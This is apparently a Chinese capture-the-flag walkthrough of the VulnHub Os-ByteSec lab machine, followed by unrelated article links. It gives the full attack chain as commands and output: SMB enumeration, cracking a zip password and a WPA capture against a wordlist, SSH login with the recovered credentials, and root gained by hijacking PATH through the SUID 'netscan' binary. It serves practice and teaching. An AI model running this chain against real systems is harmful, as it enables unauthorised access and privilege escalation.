Os-ByteSec

下载地址:hackNos: Os-Bytesec ~ VulnHub

1 信息收集

1.1 端口扫描

1.2 后台目录扫描

# 没有啥东东

---- Scanning URL: http://192.168.0.3/ ----

http://192.168.0.3/css/

http://192.168.0.3/gallery/

http://192.168.0.3/html/

http://192.168.0.3/img/

http://192.168.0.3/index.html

http://192.168.0.3/js/

http://192.168.0.3/news/

2 服务漏洞利用

2.1 检测smb服务漏洞

  1. 使用nmap扫描smb漏洞:没啥东东

    nmap -sV -T4 -p139,445 192.168.0.3 --script smb-vuln-*

  2. 使用smbmap枚举smb用户信息:匿名访问无权限

    smbmap -H 192.168.0.3

  3. 使用enum4linux检测目标系统上的smb服务:找到3个用户

    enum4linux 192.168.0.3

S-1-22-1-1000 Unix User\sagar (Local User)
    
S-1-22-1-1001 Unix User\blackjax (Local User)
    
S-1-22-1-1002 Unix User\smb (Local User)

  4. 查看smb用户是否有列出用户共享目录权限:smb用户可以无密码列出共享目录

  5. 使用smbclient命令列出smb隐藏目录

    smbclient //192.168.0.3/smb -U smb
    
get main.txt
    
get safe.zip

  6. 查看下载的文件

    # main.txt 没有东东
    
safe.zip解压需要密码

  7. 暴破safe.zip文件密码:

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

  8. 解压后发现user.cap包为无线wps的抓包,使用aricrack-ng暴力猜解:

    aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

blackjax:snowflake

2.2 GetShell

  1. 尝试登录ssh

    ssh blackjax@192.168.0.3 -p 2525

  2. 切换shell

    python -c "import pty;pty.spawn('/bin/bash')"

3 提权

3.1 尝试提权

  1. 利用sudo提权:失败

    sudo su -

3.2 收集当前系统信息

  1. 查看目标系统中存在哪些用户:sagar,blackjax,smb

  2. 在blackjax用户家目录下得到user.txt

    # 查找每个用户所创建的文件
    
find / -user 1001 2>/dev/null

f589a6959f3e04037eb2b3eb0ff726ac
    
明文:abhishek

  3. 查找目标系统中拥有SID权限的命令:netscan

    blackjax@nitin:~$ find / -type f -perm -u=s 2>/dev/null
    
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    
/usr/lib/openssh/ssh-keysign
    
/usr/lib/policykit-1/polkit-agent-helper-1
    
/usr/lib/snapd/snap-confine
    
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
    
/usr/lib/eject/dmcrypt-get-device
    
/usr/bin/newgidmap
    
/usr/bin/gpasswd
    
/usr/bin/newuidmap
    
/usr/bin/chfn
    
/usr/bin/passwd
    
/usr/bin/chsh
    
/usr/bin/at
    
/usr/bin/pkexec
    
/usr/bin/newgrp
    
/usr/bin/netscan
    
/usr/bin/sudo
    
/bin/ping6
    
/bin/fusermount
    
/bin/mount
    
/bin/su
    
/bin/ping
    
/bin/umount
    
/bin/ntfs-3g

3.3 利用SID命令劫持系统命令提权:netscan

  1. 确认netscan功能:输出结果与netstat -pant相似

    blackjax@nitin:~$ netscan
    
Active Internet connections (servers and established)
    
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    
tcp        0      0 0.0.0.0:2525            0.0.0.0:*               LISTEN      1031/sshd
    
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      1266/smbd
    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1042/mysqld
    
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      1266/smbd
    
tcp        0     36 10.1.1.3:2525           192.168.0.2:60762       ESTABLISHED 2186/sshd: blackjax
    
tcp        0      0 10.1.1.3:2525           192.168.0.2:60760       ESTABLISHED 1687/sshd: blackjax
    
tcp6       0      0 :::2525                 :::*                    LISTEN      1031/sshd
    
tcp6       0      0 :::445                  :::*                    LISTEN      1266/smbd
    
tcp6       0      0 :::139                  :::*                    LISTEN      1266/smbd
    
tcp6       0      0 :::80                   :::*                    LISTEN      1173/apache2

  2. 分析netscan文件

    blackjax@nitin:~$ whereis netscan
    
netscan: /usr/bin/netscan
    
blackjax@nitin:~$ whereis xxd
    
xxd: /usr/bin/xxd /usr/share/man/man1/xxd.1.gz
    
blackjax@nitin:~$ xxd /usr/bin/netscan | less
    
# 调用的是netstat -pant

  3. 当Unix调用系统命令时,首先会查找本地目录下的命令文件,如果存在,优先执行本地的命令;如果不存在,则通过系统变量查找要执行的命令文件

    blackjax@nitin:~$ cd /tmp/
    
blackjax@nitin:/tmp$ echo "/bin/bash" > netstat
    
blackjax@nitin:/tmp$ chmod +x netstat
    
blackjax@nitin:/tmp$ echo $PATH
    
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
    
# 添加/tmp目录下的命令到系统的环境变量中
    
blackjax@nitin:/tmp$ export PATH=/tmp:$PATH
    
blackjax@nitin:/tmp$ netscan
    
root@nitin:/tmp#

Os-ByteSec的更多相关文章

  1. NodeJs之OS

    OS Node.js提供了一些基本的底层操作系统的模块OS. API var os = require('os'); console.log('[arch] 操作系统CPU架构'+os.arch()) ...

  2. Node.js:OS模块

    os模块,可以用来获取操作系统相关的信息和机器物理信息,例如操作系统平台,内核,cpu架构,内存,cpu,网卡等信息. 使用如下所示: const os = require('os'); var de ...

  3. Xamarin+Prism开发详解四:简单Mac OS 虚拟机安装方法与Visual Studio for Mac 初体验

    Mac OS 虚拟机安装方法 最近把自己的电脑升级了一下SSD固态硬盘,总算是有容量安装Mac 虚拟机了!经过心碎的安装探索,尝试了国内外的各种安装方法,最后在youtube上找到了一个好方法. 简单 ...

  4. Mac OS 使用 Vagrant 管理虚拟机(VirtualBox)

    Vagrant(官网.github)是一款构建虚拟开发环境的工具,支持 Window,Linux,Mac OS,Vagrant 中的 Boxes 概念类似于 Docker(实质是不同的),你可以把它看 ...

  5. Mac OS、Ubuntu 安装及使用 Consul

    Consul 概念(摘录): Consul 是 HashiCorp 公司推出的开源工具,用于实现分布式系统的服务发现与配置.与其他分布式服务注册与发现的方案,比如 Airbnb 的 SmartStac ...

  6. java 利用ManagementFactory获取jvm,os的一些信息--转

    原文地址:http://blog.csdn.net/dream_broken/article/details/49759043 想了解下某个Java项目的运行时jvm的情况,可以使用一些监控工具,比如 ...

  7. 让 ASP.NET vNext 在 Mac OS 中飞呀飞。。。

    写在前面 阅读目录: 娓娓道来 Install ASP.NET vNext Command Line Tools 安装 Homebrew 使用 Homebrew,安装 KVM Install Subl ...

  8. Mac OS X 上编写 ASP.NET vNext (二) IDE配置

    上一篇中介绍了如何在OS X上搭建.Net运行时.不过光有运行时还不够,还需要有一个好用的IDE,有了IDE的支持,OS X上的开发才称为可能. 和上篇类似,这里先列举出具体步骤,个人可以根据自己的情 ...

  9. 在Mac OS X上安装ASP.NET 5(译文)

    ASP.NET 5 运行在包括OS X的可用于多个平台的.NET Execution Environment(DNX)上.本文介绍如何在OS X上通过HomeBrew安装DNX和ASP.NET 5. ...

  10. Python标准模块--os

    1.模块简介 os模块主要包含普遍的操作系统相关操作,如果开发者希望自己开发的Python应用能够与平台无关,尤其需要关注os这个模块. 2.模块使用 2.1 os模块 1. os.name,输出字符 ...

随机推荐

  1. 学习ASP.NET Core Blazor编程系列十五——查询

    学习ASP.NET Core Blazor编程系列一--综述 学习ASP.NET Core Blazor编程系列二--第一个Blazor应用程序(上) 学习ASP.NET Core Blazor编程系 ...

  2. Vuex极速入门

    01.什么是Vuex? 1.1.为什么需要状态管理? 在复杂的系统中,我们会把系统按照业务逻辑拆分为多个层次.多个模块,采用组件式的开发方式.而此时不同模块.父子模块之间的通信就成了一个问题. 为了解 ...

  3. 如何通过 C#/VB.NET 将 PDF 转为 Word

    众所周知,PDF 文档支持特长文件,集成度和安全可靠性都较高,可有效防止他人对 PDF 内容进行更改,所以在工作中深受大家喜爱.但是在工作中,我们不可避免的会对 PDF 文档进行修改或再编辑,这时我们 ...

  4. 第一篇:前端基础之HTML

    HTML介绍 Web服务本质 import socket sk = socket.socket() sk.bind(("127.0.0.1", 8080)) sk.listen(5 ...

  5. Triple 协议支持 Java 异常回传的设计与实现

    作者:Apache Dubbo Contributor 陈景明 背景 在一些业务场景, 往往需要自定义异常来满足特定的业务, 主流用法是在catch里抛出异常, 例如: public void dea ...

  6. ssm——spring整理

    目录 1.概述 2.Spring工厂与IOC 2.1.为什么要有Spring框架 2.2.什么是IOC 2.Spring工厂对实例注入 2.1.使用标签进行注入 2.2.使用注解进行注入 2.2.3. ...

  7. [编程基础] Python随机数生成模块总结

    Python随机数生成模块教程演示如何在Python中生成伪随机数. 1 介绍 1.1 随机数字生成器 随机数生成器(RNG)生成一组在外观上不显示任何可区分模式的值.随机数生成器分为两类:硬件随机数 ...

  8. Apache Kafka 的基本概念

    基本概念 主题 Topic topic 是 Kafka 最基础的组织单位,类似于关系数据库中的数据表.做为使用 kafka 的开发者,你最应该考虑的是和 topoc 相关的抽象.创建不同的 topic ...

  9. 买不到的数目【第四届蓝桥杯省赛C++A组,第四届蓝桥杯省赛JAVAC组】

    买不到的数目 小明开了一家糖果店. 他别出心裁:把水果糖包成4颗一包和7颗一包的两种. 糖果不能拆包卖. 小朋友来买糖的时候,他就用这两种包装来组合. 当然有些糖果数目是无法组合出来的,比如要买 10 ...

  10. flutter 底部滑动导航,页面滑动同时让底部导航跟着变动,除了点击还可以滑动哦~~

    实现点击以及滑动都可以切换导航的效果 核心代码 完整代码 // 输入 imrm 快速生成下面 import 'package:flutter/material.dart'; import 'Home. ...